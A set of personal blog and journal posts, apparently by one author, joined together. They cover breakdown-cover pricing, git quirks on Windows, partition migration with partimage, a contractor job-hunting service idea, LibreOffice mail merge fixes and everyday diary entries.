[](/images/blog/google-teams-calendar/3-change-colour.png)
<file_sep>---
layout: post
title: AA Gold member benefits, the real cost
date: '2012-07-10T19:13:00.000Z'
author: <NAME>
tags:
modified_time: '2012-07-21T18:01:03.574Z'
thumbnail: http://1.bp.blogspot.com/-A4lqKF45sig/T_x3sQI1LxI/AAAAAAAAAHE/b0U0t-K1vZE/s72-c/20120710_001.jpg
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6561884291165371407
blogger_orig_url: https://timwise.blogspot.com/2012/07/aa-gold-member-benefits-real-cost.html
---
# Breakdown cover maths
So, I'm getting rather fed up with the AA taking the michael every year with
their renewals. Yes, I gather the RAC are just as bad but I think they need to
realise their customers aren't stupid, know exactly what they are playing at,
and can do the maths.
I want to highlight what I think is a particularly dirty trick, making
something look like a free perk when it's anything but.
# So here's some numbers:
This is for a single car policy covering Roadside, Home Start and Relay
starting July 2012 paying annually for a year up front. (The monthly option is
10% more expensive, go figure). Numbers rounded to pounds.
* Renewal through the post: **£135**
* Matching [RAC cover](http://www.rac.co.uk/uk-breakdown/)(checked online &
by phone): **£101**
* [AA online
price](http://www.theaa.com/breakdown-cover/uk-breakdown/view-options.do?optMshp=vcon300)
for new customers: **£92** (so much for 6 years' loyalty, a **<span
style="color: red;">£43</span>** kick in the teeth)
* AA phone price: **£116**
* AA phone price _without gold membership "benefits"_: **£89**
That means, the AA are pricing their gold benefits at **<span style="color:
red;">£27</span>** even though they look like they are free on the renewal
letter! Some cheek.

I queried the details of this so called benefit and established the following:
* _"Accident Management"_ - means being towed by the AA after an accident
(something you may be covered for under your car insurance policy)
* _European Breakdown Cover_ - only useful if you are going abroad
(obviously), did you really want to be paying for it?
* _"Family Associates Cover for under 17s"_ - something about teenagers, I
don't have any so not very useful to me
* _Key Insurance_ - this could be valuable, but £27/year sounds like very
expensive insurance to me even though they are expensive items to replace.
* _Legal Advice_ - **Included as standard!** So not a gold benefit at all.
Weasels.
* _Technical Advice_ - **Included as standard!** See above. Still weasels.
So it turns out that the supposed discount of **£44.90** on the posted renewal
was actually a **<span style="color: red;">£46</span>** insult to my
intelligence.
I'm no money saving expert, but that's outrageous.
<file_sep>---
layout: post
title: Git, Windows and Line endings
date: '2012-01-11T09:05:00.009Z'
author: <NAME>
tags:
- windows
- git
- critique
modified_time: '2012-05-10T10:36:45.076Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5718834994106059896
blogger_orig_url: https://timwise.blogspot.com/2012/01/git-windows-and-line-endings.html
---
I have come to the unfortunate conclusion that git is not the perfect tool for
teams developing exclusively on Windows. And by that I mean, I cannot recommend
it unconditionally as I would like to be able to do.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/6375201587/"><img
src="https://live.staticflickr.com/6237/6375201587_3a4b7d4a19.jpg"
alt="Slightly amusing photo of for-sale sign in a bin"></a>
</div>
The main competition I would be considering is Microsoft's TFS.
I have had plenty of experience working with git under windows (as well as on
linux), and what follows are the three reasons I can't wholeheartedly recommend
git to a pure windows team. There are of course many reasons to avoid the
alternatives, but that is outside the scope of what I wanted to say here.
Just for the record, in spite of these flaws, I still think git is the best
thing since sliced bread.
# File renaming
This is an outright bug that unfortunately the msysgit developers have chosen
not to address (as is their prerogative), and I don't have the resources needed
to provide a patch of sufficient quality or run my own variant of msysgit.
* [Git-for-windows page on all the case issues](https://github.com/git-for-windows/git/wiki/File-names,-Branch-names,-Path-quotation,-Executable-bit-and-file-modes,-core.FileMode)
The simple test is to change the case of a file's name, which fails, however
most obvious workaround (rename to another file name in one commit, and back
again in another) actually makes the problem worse. This is because the bug
also affects checkouts, so when git on another team member's machine attempts
to update the working copy directly from its previous state directly to the
requested revision (usually the latest), the "checkout" fails half way through
leaving the team member flummoxed.
This is a particularly insidious bug for a team. You will generally have some
people who are stronger with git (or pick it up quickly), and some who are not
interested or struggle with the new system. Unfortunately if your team trips
over this bug, *every* team member will have to work out how to get past it,
and it is not immediately obvious from the symptoms what the problem might be
or how to solve it. It also leaves the victim's source directory in an
inconsistent state, so if they try to ignore the problem and carry on they will
get into more of a pickle.
Having to notify every member of your team that you have changed the case of a
file and point them to a workaround is hardly going to endear them to their new
fangled source control "git".
A real world example of why this might happen:
File in your source tree that has been around since before you had any naming
conventions: "_VATRate.cs_" containing a _VATRate_ class. (Value Added Tax).
You now enforce a naming convention where Acronyms are in Pascal case, i.e.
_VatRate_. In order to rename the class you must also rename the file,
therefore _VATRate.cs_ is renamed to _VatRate.cs_, triggering the above bug for
your entire team whenever they happen to fetch (and worse every time they
switch between branches that do / don't have the patch).
# Line Endings
As you know from the depths of history, our beloved operating systems have
chosen different line ending systems:
* Mac: CR
* Windows: CRLF
* Linux/Unix: LF
Git has an ingenious way of handling this, and gives you three choices for
handling cross platform differences (see [git config /
core.autocrlf](http://linux.die.net/man/1/git-config)):
1. Leave them the hell alone (_false_)
2. Store them in git as LF and convert them on checkin/checkout (_auto_)
3. convert them when you checkin a file but not on checkout (_input_)
Which in theory is fine and dandy, and either of the first two should both be
fine for a pure windows team... if it wasn't for the patch tools. It would seem
that as soon as you start applying patches and using some of the more advanced
tools that come with git, they introduce inconsistent line endings into checked
in files. You also have an issue with the configuration being client side, so
it is likely one of your team members will get the setting wrong one day and
make a mess.
In my experience, neither of the first two settings are painless under windows,
leaving you with a constant overhead of meaningless / noisy diffs, and time
spent troubleshooting, and running tools to tidy up files that have had their
line endings corrupted.
It's not a show-stopper, but it does make it harder to recommend that a team
avoid TFS (for example) and use the "better" solution with all its benefits.
# Unicode file handling
I may not have my facts completely straight on this one as I'm no expert in
this area, so please forgive me and provide any corrections / references you
can in the comments.
Visual Studio has a tendency to add a byte order marker to source files. Which
as far as I know is fine. Unfortunately git then is inclined to interpret the
file as binary and refuse to show diffs.
(I'm a little uncertain on this one, but I have seen the symptoms first hand,
and it happens more than is comfortable)
# Footnote: Speed
Git is held up as an example of fast source control, and seems faster than
anything else I've used, however it's also worth mentioning that rewriting
commit histories (rebase), refreshing the status and tab-completion are (last
time I checked) all significantly slower on msysgit (windows) than git on
linux.
<file_sep>---
title: "Tonight"
date: 2004-09-20
slashdot_url: https://slashdot.org/journal/84316/tonight
---
<p>Just made dinner. Fish fingers, left over roast spuds, veggie gravy granules, yummy. Candle lit dinner for one! But that's ok, cos life isn't that bad, been out for a ride, lovely windy weather down on the lake. Was hoping to get out on a windsurfer, no chance. Have to be this weekend.</p>
<p>And I have new whiteboard which is cool.<br>Pic: <a href="http://www.timwise.co.uk/images/141_4136.JPG">http://www.timwise.co.uk/images/141_4136.JPG</a></p>
<file_sep>---
layout: post
title: IT Contractor buddy
date: 2017-05-03 13:31:51.000000000 +01:00
type: post
parent_id: '0'
published: true
password: ''
status: publish
categories: []
tags:
- startup
author:
login: timabell
email: <EMAIL>
display_name: timabell
first_name: ''
last_name: ''
permalink: "/2017/05/03/it-contractor-buddy/"
---
## A new job-hunting assistant for contractors
Calling all IT contractors; would you pay to have some of the pain of contract hunting taken away?
I'm considering launching a business for IT contractors like myself that will do the tedious and time-consuming bits of job hunting.
If this is something you think you'd be interested in then [sign up to the mailing list for early access](http://eepurl.com/cNqrrf).
## Concept
* Search job postings for you, letting you know when good matches come up, across multiple job boards.
* Submit your CV on your behalf
* Keep track of your applications (when you sent your CV where for what rate).
* Handle first contact from companies / recruiters, validating it's worth your time
* A simple monthly fee, with no long-term commitment.
* No cut of your contract rate and no fee per placement.
A concierge service for IT contractors.
As I know from first-hand experience the job hunt is a time-consuming slog where being on top of all your leads is critical to avoid being taken advantage of rate-wise by a sharp-eyed contingency recruiter, or having a deal ruined by duplicate CV submissions.
<div class="flickr-pic">
<a data-flickr-embed="true" href="https://www.flickr.com/photos/tim_abell/33461099014/" title="IMG_20170424_121829_crop"><img src="https://live.staticflickr.com/4164/33461099014_c2ce23d162.jpg" width="500" height="114" alt="IMG_20170424_121829_crop"></a>
</div>
## How is this different from all the other recruiters?
In house recruiters are agents of the hiring company, and you may have to deal with many of these. We are working for you, the contractor, no matter how many companies and agencies you are talking to. They can only help you with respect to their company.
Contingency recruiters (i.e. 3rd party recruiters) are trying to insert themselves into the deal between you and a client, sometimes with the okay of that client, sometimes without. Unlike them we are not trying to skim money off your contracts, instead we are providing a service that helps you avoid the painful bits of the job hunt, for a straight-forward monthly fee that reflects the value we provide to you. Value for value. These recruiters will not help you with leads from other recruiters, in fact letting them know about other leads is a recipe for disaster.
So neither of these will help you with your overall job hunt. You still have to manage all your leads yourself.
## How is this different from a talent agent?
You may have [read the new-yorker piece about](http://www.newyorker.com/magazine/2014/11/24/programmers-price) the agent [10x](https://www.10xmanagement.com/).
* They [charge 15% of your rate](https://www.10xmanagement.com/faq/) (a pretty big cut imho!) whereas we charge a flat rate for the service we provide; value for value.
* They are limiting themselves to the mythical 10x'er. So even though they offer a lot of the concierge I'm offering, you probably can't get them to take you on. We however will take on even non-rocket-scientist contractors as we scale, free from BS hype about "rockstars".
* Our service is clearly working for you and no-one else whereas with 10x's percentage fee it's not clear who they work for no matter what the marketing says.
* 10x are attempting to find clients directly, just like every other contingency recruiter. We don't mind where your work comes from as we aren't trying to insert ourselves into the deal, so you won't be limiting your market by working with us, in fact we'll make it easier for you to cover more of the market by doing the hard work for you.
## Sign up now!
If you think this is something you might use, then please [sign up to the mailing list](http://eepurl.com/cNqrrf) so you can get first access. There will initially be limited spaces for clients so that we don't overstretch, so [sign up now](http://eepurl.com/cNqrrf) for first-come first-served early access.
<file_sep>---
title: "swimming"
date: 2004-02-26
slashdot_url: https://slashdot.org/journal/63307/swimming
---
<p>well, that wasn't too bad at all.<br>did 500m in first half hour (definitely not non-stop though) and then i did another couple of lengths. (35 mins in all).</p>
<file_sep>---
title: "M$"
date: 2004-02-16
slashdot_url: https://slashdot.org/journal/62169/m
---
<p>Look, <a href="http://www.microsoft.com/technet/treeview/default.asp?url=/technet/ScriptCenter/Tools/twkmatic.asp">comedy </a> from Micro$oft!</p>
<file_sep>---
layout: post
title: Today's project - partimage enhancement
date: '2007-03-13T22:01:00.000Z'
author: <NAME>
tags:
- partimage
- dev
- linux
- oss
- project
modified_time: '2007-03-13T22:27:10.644Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6030191776095000293
blogger_orig_url: https://timwise.blogspot.com/2007/03/todays-project-partimage-enhancement.html
---
*me and [partimage](http://www.partimage.org/)*
I recently reorganised the partitions on my laptop, with the help of some
invaluable OSS tools.
The laptop was split into OS partitions, with a data and swap partition at the
end, but I'd started running out of space. I have since made ubuntu my only OS
at home, so no longer require multiple partitions. My partition table ended up
looking something like this: *data | OS | more data | swap*, and I wanted it to
look like this: *OS & data | swap*, but without having to rebuild (again).
With another linux box available with bags of disc space, I did something like the following:
* from each data partition and my home folder: `tar -cv datafolder | ssh
otherbox "cat > laptop/datafolder.tar"`, which gave me a tarball of all my
data
* boot into knoppix 4
* use partimage to save os partition image into filesystem of another
partition
* `scp osimage.img otherbox:laptop/`
* `fdisk` to set up new partitions
* pipe the image back into partimage across the wire: `ssh otherbox "cat
laptop/osimage.img" | partimage ....` plus some flags for batch writing to
new partition
* use parted (partition editor) to stretch partition image back up to full
size of new partition.
* fix grub with help from knoppix - `hda(0,2)` to `hda(0,0)` or something.
* remove references to non existent partitions from fstab
Which was all great, but I feel there's a feature missing from partimage.
Although it can read an image from stdin for writing to disc, it can't write an
image to stdout from disc. This would have saved me some thinking and some
hassle. So in the true spirit of OSS, I shall have a go at adding the
functionality.
So far, I have grabbed the source from sourceforge's svn server, managed to
compile the source (after being confused by a misleading error message) and
installed an IDE. I started with Eclipse, as I've been using it a bit recently
and really like it, but figure that perhaps the C++ devs aren't likely to be
java fans and maybe they would choose something else. So I've installed
KDevelop, and will be having a go with that.
<file_sep>---
title: "Swimming"
date: 2004-01-03
slashdot_url: https://slashdot.org/journal/57000/swimming
---
<p>Got up this morning and cycled to the pool. Swam 20 lengths (I think) in about 40 mins, at which point some french fish like people turned up and put me to shame. The mum dived in one end and covered half the length of the pool before even taking a stroke (or surfacing) then covered the rest in what seemed like three strokes. Bet she had no idea how hard it is for me to cover that distance.</p>
<p>Maybe I need lessons. I spotted a Reading Swimming Club bag in the changing rooms which is a bit of a clue.</p>
<p>Then I cycled back via the bike shop, which wasn't even open yet, so my gear changer is still bust. Though I did discover the <a href="http://www.slimsmith.com/rcc/home.html">reading cycling bunch</a> have a stand in Reading market on the first Saturday of the month, which is today I think.</p>
<file_sep>---
title: "shock! timwise.co.uk home page updated!"
date: 2005-03-18
slashdot_url: https://slashdot.org/journal/101268/shock-timwisecouk-home-page-updated
---
<p>About time too.</p>
<p>You can now see my complete set of browser bookmarks from my website. Pretty much updated daily.<br>Still a lot of tidying up to do as I've just shoved all my disparate bookmarks together. It's done with a bookmark synching extension for firefox, and it allows to keep all my bookmarks the same across computers / OSs profiles.</p>
<p>By the way, if you aren't already using it, then you really should give firefox a go. You'll never look back.<br><a href="http://www.mozilla.org/products/firefox/">http://www.mozilla.org/products/firefox/</a></p>
<p>Anything new your end?</p>
<p>My bebo contact details:<br><a href="http://www.bebo.com/friends/138748a653587b22">http://www.bebo.com/friends/138748a653587b22</a><br>"I am using a new service to keep in contact with my friends. Use the link [above] to become part of my address book. In the future I will be able to see any changes in your contact details."</p>
<p>xx</p>
<p>Tim</p>
<file_sep>---
title: The trap of two-stage commitments
layout: post
---
When you know there is a future time at which you'll have to "really commit" (e.g. sign something, put money down, put something in writing, commit publicly etc.) it's easy to blasély commit without thinking too hard about how things might have changed by the time the more concrete commitment is needed, or perhaps if you even really mean it. This is a trap!
There is an unspoken mismatch in understanding of what was just casually agreed:
- The person saying "yes" is often implicitly saying "assuming when actual commitment time comes this is still a valid choice", (consciously or unconsciously thinking to themselves "I can review this nearer the time and change my mind if needs be").
- The person hearing "yes", however carelessly given, is potentially hearing nothing but the "yes" and understandably thinks they can count on that regardless of further hurdles and levels of commitment.
The danger here is that even if you truly believed you could keep your word, circumstances can change, for example between verbal and written agreements, or between saying "I'll visit" and actually booking flights. Money issues, health, behaviour of others and many other things out of your control can get in the way.
I like to think I stick to my word, and that if I say I'll do something then I'll do it. I make an effort to think through whether I would or wouldn't do something before saying yes. What I have missed in my thinking sometimes is that **things change**, and I should be more reserved when answering the initial query. If circumstances don't change there would be no issue, but if they do then one can be in hot water.
On the first commitment it all seems kind of vague and far off, but on the second one it's very real, and you might realize you no longer want to honour your commitment for some reason, and now you are in a bad place of either breaking your commitment or violating your boundaries (if you can keep it at all).
The bias towards blindly saying yes and then regretting it all stems from being a "people pleaser" at heart, which probably goes back to ingrained behaviours learned in childhood. Wanting to give the "right" answer in the moment, even if the moment isn't right.
The problem with being too quick with a "yes" to please someone is that by the time you have to "actually commit", circumstances may have changed, and you may be looking for a way out.
There isn't one answer to the challenge of two-stage commitments, but here are some ways to handle that initial commitment question:
- Be more circumspect in initial response, e.g. "well maybe, let's see how it looks when the paperwork arrives"
- Buy time: "Can I get back to you on that?"
- Defer: "interesting, let me know when you have something more concrete"
- Say no - maybe it was never going to be right and you could have figured that out right away.
- Say yes, but be damn sure you're going to stick to it as if it was written in blood.
I hope reading this helps you. Writing it has helped me clarify my thinking around this tricky bit of human interaction.
If you have trouble with this kind of thing then definitely check out [Untamed by <NAME>](https://www.amazon.co.uk/Untamed-Stop-pleasing-start-living-ebook/dp/B082K7QXRQ), she has lots to say on setting boundaries.
<file_sep>---
layout: post
title: My Screencasting Setup
date: 2018-03-17 18:56:12.000000000 +00:00
type: post
published: true
status: publish
permalink: "/2018/03/17/screencasting-setup/"
---
I just made a video to demo schema explorer.
<iframe width="560" height="315" src="https://www.youtube.com/embed/cqStb6M-Q90" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>
I did this in one take with no post-production work. I figure practice will improve my selection and delivery of the content.
Behind the scenes I used the following:
## Hardware
* Dell XPS 13 - (9350 model), using the built-in webcam (up-nose view, camera in bottom left of lid for some reason), good enough for tiny pic in corner.
* [Snowball usb mic](http://amzn.to/2FGWsQQ) (great sound quality, no worrying about analogue stuff), sat on a folded towel on my desk to deaden vibrations through the mini-tripod. The snowball has 3 settings on a switch at the back, had it on 3 - omni directional, I tested [all three modes](https://youtu.be/-3rbPaJgTWA?t=1m59s) beforehand.
* Supplied stand didn't actually fit properly, so bought an [ammoon mini tripod](http://amzn.to/2pkYEmg) instead which is lovely (importantly it has the right screw thread for the mic).
* A quiet room after everyone is in bed to avoid [interruptions](https://youtu.be/Mh4f9AYRCZY), and did the recording between rain storms!
## Software
* [Linux Mint](https://linuxmint.com/) 18.3 Cinnamon
* [Vokoscreen](http://linuxecke.volkoh.de/vokoscreen/vokoscreen.html) 2.4.0 - this handles screen recording & the picture-in-picture from the webcam
I recorded the entire screen at 1920x1080 (seeing as even phones are HD now). and uploaded it to youtube. (drag-n-drop, simplez!)
## Settings
Control panel > sound > input > snowball > about 130% input volume

fullscreen capture, display 2, 1920x1080

pulse / blue-snowball selected

mpeg4, mp3, avi, 25fps

Default config apart from save path "videopath"

Webcam switched on

## Other attempts
I spent ages finding the right software and doing test takes to get sound levels etc right.
I started off with Kazaam for recording and mplayer for the webcam onscreen video.
I got mplayer to show a borderless webcam video picture on screen that I could then use with any screen recorder, but had problems with dual screen behaviour so even though I could zoom in better I gave up on that once I'd discovered vokoscreen.
You might also want to look at [https://wistia.com/soapbox](https://wistia.com/soapbox) which I hear is very good.
<file_sep>---
layout: post
title: New year new blog
date: '2017-01-17T23:36:00.000Z'
author: <NAME>
tags: blogger-import
modified_time: '2017-01-17T23:36:03.863Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-5400732084517296093
blogger_orig_url: https://timwise.blogspot.com/2017/01/new-year-new-blog.html
---
So-long blogger and thanks for all the fish.
My content to date will live on here for as long as google keep the bits spinning.
Find my new blog at [http://blog.timwise.co.uk/2017/01/17/new-year-new-blog-happy-2017/](http://blog.timwise.co.uk/2017/01/17/new-year-new-blog-happy-2017/) which will live for as long as I pay wordpress.com's bills and don't screw up my DNS config.
See y'all on the other side. Don't forget to subscribe to the new RSS feed.
<file_sep>---
layout: post
title: Converting kml to gpx with python
date: '2014-02-03T20:27:00.000Z'
author: <NAME>
tags:
modified_time: '2014-02-03T20:29:19.425Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-6598892897913494731
blogger_orig_url: https://timwise.blogspot.com/2014/02/converting-kml-to-gpx-with-python.html
---
Today I wanted to geo-code some of my photos.
I have an SLR digital camera (no gps of course), and an android phone. I
recorded a track with [My
Tracks](https://play.google.com/store/apps/details?id=com.google.android.maps.mytracks)
from google on the phone. (Not entirely recommended but works). I then fired up
digikam to run the geo-correlation and add lat-long to the exif of the files
only to discover [digikam doesn't know how to read
kml](http://community.kde.org/Digikam/GSoC2010/ReverseGeocoding#TODO_Later_versions).
Fooey.
<div class="flickr-pic">
<a href="https://www.flickr.com/photos/tim_abell/12293521763/"><img
src="https://live.staticflickr.com/3756/12293521763_39d7704c73_k.jpg" alt="people on the beach"></a>
</div>
I looked to gpsbabel, but it apparently can't handle this style of kml file, as
differentiated by the coordinates being in the following style of markup:
<gx:Track>
<when>2014-01-25T18:00:13.955Z</when>
<gx:coord>-1.885348 50.769434</gx:coord>
<when>2014-01-25T18:00:14.565Z</when>
<gx:coord>-1.885193 50.769328 53.20000076293945</gx:coord>
<when>2014-01-25T18:00:58.566Z</when>
So I wrote a python script to munge it into gpx shape:
<script src="https://gist.github.com/timabell/8791116.js"></script>
This can be run as follows:
./kmlToGpx.py "25-01 12-48.kml" > "25-01 12-48.kml.gpx"
And worked a treat for me.
After I'd done this I discovered my pet tool
[gpsprune](http://activityworkshop.net/software/gpsprune/index.html) can open
the new style kml. (I [forked gpsprune](https://github.com/timabell/gpsprune) a
while ago and added a minor feature) However I'm glad to have a command-line
tool as I have hundreds of tracks I want to convert.
Incidentally the phone can automatically sync the tracks to google drive, which
is kinda handy and then you can download them from the site etc.
<file_sep>---
title: "article: Windows rapidly approaching desktop usability!"
date: 2005-12-07
slashdot_url: https://slashdot.org/journal/123764/article-windows-rapidly-approaching-desktop-usability
---
<p>There have been many articles on the merits of linux based systems from the perspective of windows users. Now the tables are turned in this excellently written article. If you have read previous "linux versus windows" tests you will recognise the style and approach, and how it affects the conclusions reached.</p>
<p><a href="http://os.newsforge.com/article.pl?sid=05/05/18/2033216&tid=149">http://os.newsforge.com/article.pl?sid=05/05/18/2033216&tid=149</a></p>
<file_sep>---
title: Time to "Shape Up" your SCRUM processes? The new thing from Basecamp
layout: post
---
Basecamp, who are famous for carving out their own path in the software world
have documented and shared their own way of defining and building their
software-as-a-service (SaaS) product, also known as "basecamp". You can read the
whole thing here: <https://basecamp.com/shapeup>.
If like me you've mostly worked with SCRUM/Agile/Kanban style teams you should
pay attention to the ideas they share. Unlike many people who teach and follow
the wikipedia truth of SCRUM as *the* way of building software, basecamp have
not satisfied themselves with cargo-culting "industry best practice" and have
instead carefully honed their own particular way of getting the best out of
their resources.
Although the "ShapeUp" process is finely tuned to suit basecamp, there are many
things in there that the average SCRUM team could take inspiration and
improvement from without throwing out everything in place at the moment. An
example I particularly like is the way everyone can bring a pitch to the
betting table, from their own personal backlog of priorities, contrasted with
the usual approach of throwing yet another card/story onto the
team-shared dumpster-fire of a backlog / todo-list and hoping it somehow
magically gets to the top of the list just before all your chickens come home
to roost.
----
# Key features of shaping up
## Shaping
* An iterative process of taking concepts from initial idea to something that
could be built with bounded risk and expectations.
* A largely solo or pair exercise, but done in consultation with experts on the
wider team.
## Pitch
* The output of shaping.
* A detailed but high-level document outlining what should and shouldn't be
built, with room for discretion and design work by the designers and
programmers.
## Bets
* There is a meeting where pitches are discussed, prioritised and scheduled for
the next cycle of work, they "take a bet" on a pitch.
* If a pitch blows its timebox, then the default is always to stop and it
doesn't get any special priority in the next cycle. This limits the risk of
runaway unstoppable projects.
## 6-week cycle with gaps
Basecamp operate a 6-week period of building what was decided in shaping and
betting. This can either be one 6-week bet or a set of 2-week bets.
Once this is done there is a 2-week gap where people can do maintenance, tech
debt paydown, plan new things etc.
----
If you'd like to hear a bit more about ShapeUp, have a listen to
<https://pod.timwise.co.uk/5> where I go over their process in a bit more
detail with regular co-host David.
I've also written up a nice approach to avoiding a "backlog of doom" in my
[personal backlogs post](/2020/06/30/personal-backlogs/).
<file_sep>---
layout: post
title: LibreOffice mail merge - "data source 'SOURCE' was not found"
date: '2015-01-12T22:31:00.002Z'
author: <NAME>
tags:
modified_time: '2015-02-26T00:51:32.105Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3978505848471658988
blogger_orig_url: https://timwise.blogspot.com/2015/01/libreoffice-mail-merge-data-source.html
---
So another year on, LibreOffice 4.2.7.2 (via Linux Mint 17.1) still has a dog's breakfast of a mail merge feature, hey ho, hopefully it might actually get fixed following the fork from OpenOffice and the change in contribution methods.
Anyways
So I've moved machines, copied my files across and for some reason my mail merge has soiled itself and now bleats _"data source 'SOURCE' was not found"_ which is as unhelpful as it is infuriating, especially given that the "check connections" button is exactly the wrong place to look for an answer.
Turns out you actually get this if even just a single field in your document is 'broken'. How do you tell which ones are broken? Well you have to change them all to just be sure. Sigh.
The fix for me today was as follows (though with such a messy feature there's unlimited ways it can break):
1. Hit F4 and check that your connection to the spreadsheet actually exists and works, and unbreak anything you find therein. While you're in there you can marvel at how it requires a whole other file (.odb) just to remember how to get to a spreadsheet. (See below for fixing this)
2. Turn on the field names so you can see what the f*** is actually going on with "_View > Field Names (ctrl+f9)_" which will show you the fully qualified field name, which might even be completely wrong. You can now see that for whatever reason (insanity?) it embeds more than just the field name at the field place-holder.
3. And finally the way you actually fix the broken fields it's failing to tell you about actually lies under the menu item "_Edit > Fields_", where you can change all the broken references one at a time to the correct place.
4. For bonus points, if the field looks right but is silently broken somehow then you have to change the field to something else, hit okay, and then change it back again for anything to actually change, which is annoying if you have a lot of fields.
Fragile much?
Another fix I've just discovered is you can rename your data source to match the name defined in the fields (assuming they're all the same) and it'll start working again.
#### Fixing the .odb file
If you're stuck on point 1, here's how you fix it, also completely non-obvious and full of apparent dead-ends and dubious information.
1. Give up on trying to do this in writer, it doesn't seem possible, in spite of false hope from the data sources tool, it only allows you to select .odb (database) files, not spreadsheets.
2. Open up "libreoffice base", which pops open the database wizard
3. Choose "connect to an existing database"
4. In the dropdown choose "Spreadsheet"
5. Next
6. Browse for your spreadsheet
7. Next
8. Leave "register database for me" selected
9. Leave "open the database for editing" checked
10. Finish
11. It prompts to save the new database (.odb), I suggest saving it in the same folder as the spreadsheet to save future confusion.
12. You now have the database open in "base", you should see your spreadsheet sheets listed as tables
13. Open a table (i.e. a sheet) and check you can see the spreadsheet contents
14. Close "base", saving changes
15. Return to your writer document
16. Open the data sources again (F4), you should now be able to browse your spreadsheet via your newly created database.
Simpler than getting planning permission out of a vogon. :-/
Hope that helps some other poor open source die-hard who has work to do.
Useful refs:
* [http://davidmburke.com/2011/08/10/mail-merge-in-libreoffice/](http://davidmburke.com/2011/08/10/mail-merge-in-libreoffice/)
* [https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=29708](https://forum.openoffice.org/en/forum/viewtopic.php?f=30&t=29708)
* [https://www.libreoffice.org/bugzilla/buglist.cgi?quicksearch=mailmerge](https://www.libreoffice.org/bugzilla/buglist.cgi?quicksearch=mailmerge)
* [http://ask.libreoffice.org/en/question/19590/can-you-import-a-libreoffice-calc-spreadsheet-into-a-libreoffice-database/](http://ask.libreoffice.org/en/question/19590/can-you-import-a-libreoffice-calc-spreadsheet-into-a-libreoffice-database/)
<file_sep>---
title: "b3ta teddy"
date: 2004-10-24
slashdot_url: https://slashdot.org/journal/87958/b3ta-teddy
---
<p>this is great<br><a href="http://www.parachutingtrees.co.uk/rushmore.htm">http://www.parachutingtrees.co.uk/rushmore.htm</a><br>sound required</p>
<file_sep>---
layout: post
title: The BBC and the bouncing emails
date: '2012-01-25T21:22:00.001Z'
author: <NAME>
tags:
modified_time: '2012-01-25T21:22:26.819Z'
blogger_id: tag:blogger.com,1999:blog-5082828566240519947.post-3790910591580830225
blogger_orig_url: https://timwise.blogspot.com/2012/01/bbc-and-bouncing-emails.html
---
For the record, this is the staggering response I received from the BBC's iPlayer support when I helpfully let them know that the email address they use as sender when responding to feedback sent through their support web form is non-deliverable.
I think it speaks for itself. You would at least think they would set the sender address to "<EMAIL>" so you wouldn't waste time composing a response. And if you've been through the web form, you will know that filling it out once is okay, but to use it to reply? Give over!
> -------- Original Message --------
> Subject: BBC iPlayer - Case number CAS-1258137-Q271CZ
> Date: 24 Jan 2012 10:19:09 +0000
> From: <EMAIL>
> To: <NAME>
>
> Dear <NAME>
>
> Reference CAS-1258137-Q271CZ
>
> Thank you for contacting the BBC iPlayer support team.
>
> I understand you’re unhappy that the reply email you had sent to our email bounced.
>
> I’m afraid it is not possible to reply to our email because we deal with over a million audience contacts every year and we have to ensure they can be efficiently tracked using our handling system and therefore for every correspondence you need to fill the webform. In addition, our complaints, BBC iPlayer and general enquiries webforms ask for essential information such as channel, programme name and transmission date which means we don't have to write back to people unnecessarily. Using a webform also guarantees we can match a return contact up with the previous contact from that person without the need to cross-check thousands of unformatted emails which would then have to be manually transferred into the tracking system.
>
> We try to restrict public email inbox addresses where possible because we receive millions of 'spam' e-mails and a return email address would attract and generate even more. Junk mail costs the BBC a considerable amount of money because every email has to be checked before we can delete them as it’s not always easy to distinguish them from a genuine email.
>
> I appreciate this may be annoying, but we did not take this decision lightly. Our policy takes into account what is operationally efficient and avoids the need to employ additional staff to process incoming emails. I would therefore ask that you please follow the instructions in the reply you received and use our online form at www.bbc.co.uk/complaints. Your email will then be passed to a member of our team for further investigation and reply.
>
> Once again thank you for contacting BBC iPlayer.
>
> Kind Regards
> <NAME>
> BBC Audience Services
> www.bbc.co.uk/iplayer
>
> NB This is sent from an outgoing account only which is not monitored. You cannot reply to this email address but if necessary please contact us via our webform quoting any case number we provided.
And here is the bounce, so you can see why I thought they had made a mistake:
> Subject: Undelivered Mail Returned to Sender
> Date: Sat, 21 Jan 2012 07:42:07 -0500 (EST)
> From: MAILER-DAEMON (Mail Delivery System)
> To: <EMAIL>
>
> This is the Postfix program at host mxout-07.mxes.net. I'm sorry to have to inform you that your message could not be delivered to one or more recipients. Here is the reason why the message could not be delivered. <<EMAIL>>: host cluster1.eu.messagelabs.com[195.245.231.99] said: 550-Invalid recipient <<EMAIL>> 550 (#5.1.1) (in reply to RCPT TO command)
<file_sep>---
title: "gimp trouble"
date: 2006-01-04
slashdot_url: https://slashdot.org/journal/125704/gimp-trouble
---
<p>I like the gimp a lot, and have been trying out some <a href="http://www.flashgimp.com/tutorials/photoshop_tutorials.php">tutorials</a>. Then it started crashing whenever I created a new image! argh! So after a bit of searching and a pointer from a <a href="http://bugzilla.gnome.org/show_bug.cgi?id=317570">bug report</a> I tried replacing the GTK+ installation I had obtained with <a href="http://gaim.sf.net/">gaim</a> with a new one from the gimp <a href="http://gimp-win.sourceforge.net/">installer page</a>. One restart later, problem solved. I like open sauce. Closed source software companies don't tend to be keen on publishing problems, even when people have resolutions to offer.</p>
<p>A small insight into Tim's life.</p>
<file_sep>---
title: "Lecture, 19th Oct"
date: 2004-10-05
slashdot_url: https://slashdot.org/journal/85935/lecture-19th-oct
---
<p>The University of Reading Public Lecture Series 2004-2005<br><a href="http://www.rdg.ac.uk/publiclectureseries/copyright.htm">http://www.rdg.ac.uk/publiclectureseries/copyright.htm</a></p>
<p>Anyone else interested in coming? This is quite close to my work and is of particular interest to me. Txt me if you like cheese. (non sequitur)</p>
<p>Tim</p>
<file_sep>---
layout: post
title: Bash command line editing cheat sheet
date: '2014-02-10T18:33:00.000Z'
author: <NAME>
tags:
